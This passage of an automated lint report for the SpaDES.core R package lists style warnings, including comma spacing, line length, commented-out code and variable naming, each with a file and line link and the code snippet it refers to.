xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:75:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/moduleMetadata.R#L75) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be 